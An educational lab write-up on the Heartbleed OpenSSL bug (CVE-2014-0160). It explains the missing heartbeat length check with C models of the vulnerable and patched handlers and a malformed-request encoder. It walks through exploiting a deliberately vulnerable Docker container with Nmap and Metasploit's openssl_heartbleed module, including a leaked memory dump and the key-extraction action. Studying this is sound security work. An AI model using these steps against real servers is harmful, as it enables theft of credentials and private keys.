CVE-2014-0160: Heartbleed

Introduction

Heartbleed is a vulnerability that gives attackers unprecedented access to sensitive information in a server's memory. It was a serious bug in OpenSSL, the open source library that implements the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols for a large share of the Internet. It was publicly disclosed in April 2014 and left millions of web servers open to attack: OpenSSL 1.0.1 through 1.0.1f are affected, and 1.0.1g fixed it. The root cause is a missing bounds check in OpenSSL's implementation of the TLS Heartbeat Extension (RFC 6520).

What is Heartbeat?

When two computers are communicating, each needs to know that the other is still there. A heartbeat is a keep-alive mechanism: it lets two endpoints confirm that their connection is still open even when nothing is being uploaded or downloaded at the moment. In TLS this is the Heartbeat Extension (RFC 6520). One side occasionally sends a Heartbeat Request carrying a small payload of its own choosing, and the other side replies with a Heartbeat Response containing exactly the same payload, proving that the connection is still in place. The messages travel inside TLS records, so they are encrypted once the handshake has completed, but OpenSSL also accepted them before that point, which is why the exploit below can send one right after the Server Hello Done.

How Heartbleed works?

The Heartbeat Request carries a payload_length field stating how long its payload is, and the vulnerable versions of OpenSSL never checked that field against the number of bytes actually received. For example, if a request claimed a payload of 40 KB but only 20 KB arrived, the server allocated a buffer for a 40 KB response and copied 40 KB starting at the received payload, so the reply contained the 20 KB it had actually been sent followed by the next 20 KB of whatever happened to be in the process's heap. That extra memory can hold session cookies, usernames and passwords, or even the server's private key. Because payload_length is a 16-bit field, one request leaks at most 64 KB, but nothing stops the attacker from repeating it as often as they like. In computer security this is known as a buffer over-read. The fix in OpenSSL 1.0.1g is a single check: a request whose claimed length, plus the 3-byte header and 16 bytes of minimum padding, does not fit in the record actually received is silently discarded.
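To make the missing check concrete, here is an added example in C. It is not OpenSSL's code and not part of the original write-up; it models the server side with a constructed heap in which a secret happens to sit right after the received heartbeat record, a handler that trusts payload_length the way OpenSSL 1.0.1f did, and the same handler with the bounds check that 1.0.1g added. The SECRET string, the 64-byte claim and the 5-byte real payload are all made up for the demonstration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* HeartbeatMessage as it sits inside a TLS record (RFC 6520):
 *   1 byte  type            (1 = request, 2 = response)
 *   2 bytes payload_length  (big-endian, written by the sender)
 *   payload_length bytes of payload
 *   at least 16 bytes of padding
 */
#define HB_REQUEST   1
#define HB_RESPONSE  2
#define HB_PADDING   16

/* Constructed stand-in for the server's heap. The first RECORD_LEN bytes are
 * the request actually received (OpenSSL's rrec.length); SECRET follows
 * immediately, the way another allocation might. Nothing here is real data. */
#define SECRET       "user=alice&password=hunter2"
#define REAL_PAYLOAD 5    /* payload bytes the client really sent */
#define CLAIMED_LEN  64   /* payload_length the client wrote on the wire */
#define RECORD_LEN   (1 + 2 + REAL_PAYLOAD + HB_PADDING)

static unsigned char heap[RECORD_LEN + sizeof(SECRET) + 64];
static unsigned char response[256];

static void build_heap(void)
{
    memset(heap, 0, sizeof heap);
    heap[0] = HB_REQUEST;
    heap[1] = (CLAIMED_LEN >> 8) & 0xff;
    heap[2] = CLAIMED_LEN & 0xff;
    memcpy(heap + 3, "hello", REAL_PAYLOAD);       /* bytes 8..23 stay zero: padding */
    memcpy(heap + RECORD_LEN, SECRET, sizeof(SECRET) - 1);
}

/* Shared response builder, shaped like tls1_process_heartbeat: size the reply
 * as 1 + 2 + payload + padding, echo type and length, then memcpy `payload`
 * bytes starting at the received payload. If payload lies, the memcpy runs
 * past the record into whatever follows it in memory. */
static int build_response(const unsigned char *pl, unsigned int payload,
                          unsigned char *out, size_t cap)
{
    size_t n = 1 + 2 + payload + HB_PADDING;
    if (n > cap) return -1;
    out[0] = HB_RESPONSE;
    out[1] = (payload >> 8) & 0xff;
    out[2] = payload & 0xff;
    memcpy(out + 3, pl, payload);
    memset(out + 3 + payload, 0, HB_PADDING);       /* OpenSSL uses random bytes */
    return (int)n;
}

/* Vulnerable handler (OpenSSL 1.0.1 to 1.0.1f): rec_len is never consulted. */
int heartbeat_vulnerable(const unsigned char *rec, size_t rec_len,
                         unsigned char *out, size_t cap)
{
    (void)rec_len;
    unsigned int payload = (rec[1] << 8) | rec[2];
    if (rec[0] != HB_REQUEST) return -1;
    return build_response(rec + 3, payload, out, cap);
}

/* Patched handler (OpenSSL 1.0.1g): the added length checks. A request whose
 * claimed payload does not fit in the received record is silently discarded. */
int heartbeat_fixed(const unsigned char *rec, size_t rec_len,
                    unsigned char *out, size_t cap)
{
    if (1 + 2 + HB_PADDING > rec_len) return 0;           /* too short to parse */
    unsigned int payload = (rec[1] << 8) | rec[2];
    if (rec[0] != HB_REQUEST) return -1;
    if (1 + 2 + payload + HB_PADDING > rec_len) return 0; /* the Heartbleed fix */
    return build_response(rec + 3, payload, out, cap);
}

/* Rebuild the heap and feed the received record to one handler. Returns the
 * response length: -1 on error, 0 when the request was dropped. */
int run_handler(int (*handler)(const unsigned char *, size_t, unsigned char *, size_t))
{
    build_heap();
    return handler(heap, RECORD_LEN, response, sizeof response);
}

/* 1 if SECRET appears anywhere in the first n bytes of the response. */
int response_contains_secret(int n)
{
    size_t s = sizeof(SECRET) - 1;
    for (size_t i = 0; n > 0 && i + s <= (size_t)n; i++)
        if (memcmp(response + i, SECRET, s) == 0) return 1;
    return 0;
}

int main(void)
{
    int n = run_handler(heartbeat_vulnerable);
    printf("vulnerable: %d-byte response, secret leaked: %s\n",
           n, response_contains_secret(n) ? "yes" : "no");
    n = run_handler(heartbeat_fixed);
    printf("fixed: %d-byte response (0 means the request was discarded)\n", n);
    return 0;
}
```

The vulnerable handler answers the 24-byte record with an 83-byte response (3 header + 64 claimed + 16 padding) whose middle is the neighbouring allocation, secret included; the fixed handler returns 0 and sends nothing back, which is exactly what a patched server does when the Metasploit module probes it.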

Heartbleed Real Cases

  • The Canada Revenue Agency (CRA) reported the theft of Social Insurance Numbers belonging to 900 taxpayers on April 8, 2014. After discovering the attack, the CRA temporarily shut down some access to its website late on April 8 because of security concerns about the Heartbleed bug. On April 16 a computer science student was charged in relation to the theft with unauthorized use of a computer and mischief in relation to data.
  • In August 2014, Community Health Systems, the second-largest for-profit hospital chain in the United States, disclosed that 4.5 million patient records had been compromised. The attackers reportedly used Heartbleed to steal security keys (user credentials) from a vulnerable VPN device and then used them to get into the network.

Implementation

Current OpenSSL releases are patched, so to reproduce the attack we need a deliberately vulnerable target: a Docker container that still ships an affected OpenSSL build. Only run the following against a container or host you own; sending oversized heartbeats to third-party servers is an attack, not a test.

Step 1: Install Docker, Nmap and Metasploit

First of all, make sure that Docker, Nmap and Metasploit are installed. Here are some online resources about installation (for Ubuntu 18.04.2):
  • Docker installation: https://docs.docker.com/install/linux/docker-ce/ubuntu/
  • Nmap installation: https://nmap.org/download.html
  • Metasploit installation: https://www.darkoperator.com/installing-metasploit-in-ubunt/

Step 2: Obtain the container affected by Heartbleed

Once the installation has finished, pull and start the vulnerable container in the background:

$ sudo docker run -d andrewmichaelsmith/docker-heartbleed

Step 3: Obtain the container ID and IP address

List the running containers and note the CONTAINER ID of the Heartbleed container (this is a container ID, not an image ID):

$ sudo docker ps

Then read the container's IP address from its network settings:

$ sudo docker inspect <container ID> | grep IPAddress

Next, run Nmap's ssl-heartbleed script against the container's IP address and TLS port (443 in this container) to confirm that the service is reachable and is reported as vulnerable:

$ sudo nmap -p <port_number> --script ssl-heartbleed <ip_address>

Step 4: Metasploit configuration

First, launch Metasploit and load the OpenSSL Heartbleed scanner module:

$ msfconsole -q
msf > use auxiliary/scanner/ssl/openssl_heartbleed

Then list the module's options with show options. The transcript below was captured on Metasploit 5 (hence the msf5 prompt):

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > show options

Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   LEAK_COUNT        1                yes       Number of times to leak memory per SCAN or DUMP invocation
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             443              yes       The target port (TCP)
   STATUS_EVERY      5                yes       How many retries until key dump status
   THREADS           1                yes       The number of concurrent threads
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)


Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability

RHOSTS has no value yet. Set it to the container IP address obtained in Step 3 (RPORT already defaults to 443, the port this container listens on):

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set RHOSTS <ip_address>

Then set VERBOSE to true so that the module prints the handshake records and the leaked memory instead of a one-line verdict:

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set VERBOSE true

The default action SCAN only reports whether the host leaks. The module also offers DUMP, which writes the leaked memory to a loot file, and KEYS, which searches the leaked memory for the server's RSA private key; switch with set action DUMP or set action KEYS.

Step 5: Exploit it!

Run the module (run is a synonym for exploit in an auxiliary module):

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > exploit

The module performs a partial handshake, sends one malformed heartbeat and prints a 64 KB slice of the TLS server process's heap (in this example RHOSTS is 172.17.0.2 and RPORT is 443). In an idle container most of that slice is zero-filled, which is why the dump below is mostly dots; raising LEAK_COUNT and sending some real requests to the server first (for example a login form with credentials) makes sensitive data show up:

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > exploit

[*] 172.17.0.2:443        - Leaking heartbeat response #1
[*] 172.17.0.2:443        - Sending Client Hello...
[*] 172.17.0.2:443        - SSL record #1:
[*] 172.17.0.2:443        - 	Type:    22
[*] 172.17.0.2:443        - 	Version: 0x0301
[*] 172.17.0.2:443        - 	Length:  86
[*] 172.17.0.2:443        - 	Handshake #1:
[*] 172.17.0.2:443        - 		Length: 82
[*] 172.17.0.2:443        - 		Type:   Server Hello (2)
[*] 172.17.0.2:443        - 		Server Hello Version:           0x0301
[*] 172.17.0.2:443        - 		Server Hello random data:       5c96decbd982591e1ded4eb483cbb7263ee4b57c8040f04912fd9a31b7d505fa
[*] 172.17.0.2:443        - 		Server Hello Session ID length: 32
[*] 172.17.0.2:443        - 		Server Hello Session ID:        c119666e63af2ab8c58218501d45105d8cff5da88c71b68b23af6bb7df7e5881
[*] 172.17.0.2:443        - SSL record #2:
[*] 172.17.0.2:443        - 	Type:    22
[*] 172.17.0.2:443        - 	Version: 0x0301
[*] 172.17.0.2:443        - 	Length:  921
[*] 172.17.0.2:443        - 	Handshake #1:
[*] 172.17.0.2:443        - 		Length: 917
[*] 172.17.0.2:443        - 		Type:   Certificate Data (11)
[*] 172.17.0.2:443        - 		Certificates length: 914
[*] 172.17.0.2:443        - 		Data length: 917
[*] 172.17.0.2:443        - 		Certificate #1:
[*] 172.17.0.2:443        - 			Certificate #1: Length: 911
[*] 172.17.0.2:443        - 			Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=www.example.com,O=Dis,L=Springfield,ST=Denial,C=US>, issuer=#<OpenSSL::X509::Name CN=www.example.com,O=Dis,L=Springfield,ST=Denial,C=US>, serial=#<OpenSSL::BN:0x000056356ef53ee0>, not_before=2014-04-10 20:45:22 UTC, not_after=2015-04-10 20:45:22 UTC>
[*] 172.17.0.2:443        - SSL record #3:
[*] 172.17.0.2:443        - 	Type:    22
[*] 172.17.0.2:443        - 	Version: 0x0301
[*] 172.17.0.2:443        - 	Length:  525
[*] 172.17.0.2:443        - 	Handshake #1:
[*] 172.17.0.2:443        - 		Length: 521
[*] 172.17.0.2:443        - 		Type:   Server Key Exchange (12)
[*] 172.17.0.2:443        - SSL record #4:
[*] 172.17.0.2:443        - 	Type:    22
[*] 172.17.0.2:443        - 	Version: 0x0301
[*] 172.17.0.2:443        - 	Length:  4
[*] 172.17.0.2:443        - 	Handshake #1:
[*] 172.17.0.2:443        - 		Length: 0
[*] 172.17.0.2:443        - 		Type:   Server Hello Done (14)
[*] 172.17.0.2:443        - Sending Heartbeat...
[*] 172.17.0.2:443        - Heartbeat response, 65535 bytes
[+] 172.17.0.2:443        - Heartbeat response with leak, 65535 bytes
[*] 172.17.0.2:443        - Printable info leaked:
......\..@.. ...Q......4kM=S.~V}.@R.....f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 16008 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@.................................................................................................................................................................................................................................................................................................................................e@.....................}.@....6...J......9._R...t....Q....c.r......~..Z.y.B.*).2JFzc^..Y.7{...3..F..;r....x.[....xt.}.......3...b....t}.....h..9>.$!.........:..J%...p....Z...=......x&...qB.w...6...HS%..7B.$k..i._*).t..!.j..5L.u.....}...W.....6i.nW...}.B.l....%..h..S........W_....J.....A.g..!K..h.p..OI]xVh.-.....L.j.....(....t.......n"r6.9....}......#..j..gf{.U....L..JUo....c..X.>.fI.4..#..[*B..1..;C.4...x~....Y.{.YB.,.9....*.[.r..@[.I...H.`...3:..iekn"...W.......J.$.@o.{.^.C..@.....{...gZw5..L.ga.......q..0%).........W..../..k..c.h5.:.........[~...#.!S...rh..r...._%.%......P0N0...U........G...1.."..mud.a.%.0...U.#..0.....G...1.."..mud.a.%.0...U....0....0...*.H.............V..E..9\P..X@..D.........~...tV.T.;.y.V...E..-...A.=....q....p.....h....7..p.N~.>.sQ>..~.5..*..Kb..E5:r.......z..j.p".,.....&.{....XT..b.......z.{.2...%/..9$7~O..Y..+..<..~J.n.9.7..2b..7....Y..O^vsx"Q...\....I..].O.(.;........e..".i...3g.../^....rvQ.D$.X.....................................................
................................................................................ repeated 14866 times .....................................................................................................................................@..................................................................................................................................... repeated 159 
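The following is an added example in C, not part of the original write-up and not Metasploit's code. It shows the client side of the exchange that the transcript above summarises as "Sending Heartbeat..." and "Heartbeat response with leak": how the malformed heartbeat record is encoded, and the check a scanner applies to the reply. It models only the heartbeat records, not the Client Hello / Server Hello shown above, and the two server replies are constructed samples (the session cookie and password in them are invented).

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

#define TLS_ALERT      0x15   /* TLS record types */
#define TLS_HEARTBEAT  0x18
#define HB_REQUEST     1      /* HeartbeatMessageType */
#define HB_RESPONSE    2

static unsigned char reply[4096];   /* scratch buffer for the samples below */

/* Write one TLS record: type, version 0x0301 (TLS 1.0), 2-byte length, body. */
static size_t put_record(unsigned char *out, unsigned char type,
                         const unsigned char *body, size_t n)
{
    out[0] = type; out[1] = 0x03; out[2] = 0x01;
    out[3] = (n >> 8) & 0xff; out[4] = n & 0xff;
    memcpy(out + 5, body, n);
    return 5 + n;
}

/* Encode the record a scanner sends: a HeartbeatRequest whose payload_length
 * field says `claimed` while only `sent` payload bytes follow it. An honest
 * client keeps claimed == sent; the scanner lies, e.g. claimed = 0xffff. */
size_t encode_heartbeat_request(unsigned char *out, size_t cap, uint16_t claimed,
                                const unsigned char *payload, size_t sent)
{
    unsigned char hdr[3];
    if (3 + sent > 0xffff || cap < 5 + 3 + sent) return 0;
    hdr[0] = HB_REQUEST;
    hdr[1] = claimed >> 8; hdr[2] = claimed & 0xff;
    memcpy(out + 5, hdr, 3);
    memcpy(out + 8, payload, sent);
    out[0] = TLS_HEARTBEAT; out[1] = 0x03; out[2] = 0x01;
    out[3] = ((3 + sent) >> 8) & 0xff; out[4] = (3 + sent) & 0xff;
    return 8 + sent;
}

typedef struct {
    int    vulnerable;   /* server echoed more payload than we sent */
    size_t leaked;       /* how many bytes of server memory that is */
    int    alert;        /* server answered with a TLS alert instead */
} hb_verdict;

/* The check behind "Heartbeat response with leak": walk the records in
 * buf[0..len), glue heartbeat record bodies together (a long response is
 * split across several 16 KB records), and flag the host if the response's
 * payload_length exceeds the `sent` bytes we actually transmitted. */
hb_verdict check_reply(const unsigned char *buf, size_t len, size_t sent)
{
    static unsigned char hb[1 << 16];
    hb_verdict v = {0, 0, 0};
    size_t hb_len = 0, off = 0;
    while (off + 5 <= len) {
        unsigned char type = buf[off];
        size_t rlen = (buf[off + 3] << 8) | buf[off + 4];
        if (off + 5 + rlen > len) break;                 /* truncated record */
        if (type == TLS_ALERT) v.alert = 1;
        if (type == TLS_HEARTBEAT && hb_len + rlen <= sizeof hb) {
            memcpy(hb + hb_len, buf + off + 5, rlen);
            hb_len += rlen;
        }
        off += 5 + rlen;
    }
    if (hb_len >= 3 && hb[0] == HB_RESPONSE) {
        size_t payload = (hb[1] << 8) | hb[2];
        if (payload > sent) { v.vulnerable = 1; v.leaked = payload - sent; }
    }
    return v;
}

/* Constructed reply from a vulnerable server to a request that sent "abc" but
 * claimed 64 bytes: type 2, payload_length 64, the 3 echoed bytes, 61 bytes of
 * neighbouring heap (invented), 16 bytes of padding, split over two records. */
size_t sample_vulnerable_reply(unsigned char *out)
{
    static const char memory[] = "session=9f1c2b; user=alice; password=hunter2";
    unsigned char body[3 + 64 + 16];
    size_t n;
    memset(body, 0, sizeof body);
    body[0] = HB_RESPONSE; body[1] = 0; body[2] = 64;
    memcpy(body + 3, "abc", 3);
    memcpy(body + 6, memory, sizeof memory - 1);   /* 44 bytes; the rest stays zero */
    n = put_record(out, TLS_HEARTBEAT, body, 40);
    return n + put_record(out + n, TLS_HEARTBEAT, body + 40, sizeof body - 40);
}

/* Constructed reply from a server that never negotiated the extension: a fatal
 * unexpected_message alert (level 2, description 10) and no heartbeat at all. */
size_t sample_alert_reply(unsigned char *out)
{
    static const unsigned char alert[] = {2, 10};
    return put_record(out, TLS_ALERT, alert, sizeof alert);
}

int main(void)
{
    hb_verdict v = check_reply(reply, sample_vulnerable_reply(reply), 3);
    printf("vulnerable server: vulnerable=%d, %zu bytes of memory leaked\n", v.vulnerable, v.leaked);
    v = check_reply(reply, sample_alert_reply(reply), 3);
    printf("no-heartbeat server: vulnerable=%d, alert=%d\n", v.vulnerable, v.alert);
    v = check_reply(reply, 0, 3);
    printf("patched server (no reply at all): vulnerable=%d\n", v.vulnerable);
    return 0;
}
```

The decisive signal is not the content of the reply but its payload_length: a server that answers a 3-byte payload with a 64-byte (or, as in the transcript, 65535-byte) response has filled the difference from its own memory. A patched OpenSSL drops the request and sends nothing, so a scanner has to treat a timeout as "not vulnerable" (that is what RESPONSE_TIMEOUT in the module options is for), and a server that never negotiated the extension answers with a fatal unexpected_message alert.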

References

  • “Heartbleed”, https://en.wikipedia.org/wiki/Heartbleed
  • “Heartbeat (computing)”, https://en.wikipedia.org/wiki/Heartbeat_(computing)
  • “The Heartbleed Bug”, http://heartbleed.com/
  • “What is the Heartbleed bug, how does it work and how was it fixed?”, https://www.csoonline.com/article/3223203/what-is-the-heartbleed-bug-how-does-it-work-and-how-was-it-fixed.html
  • “Quickie: exploiting Heartbleed (CVE-2014–0160)”, https://bytesoverbombs.io/quickie-exploiting-heartbleed-cve-2014-0160-b9e0f0091683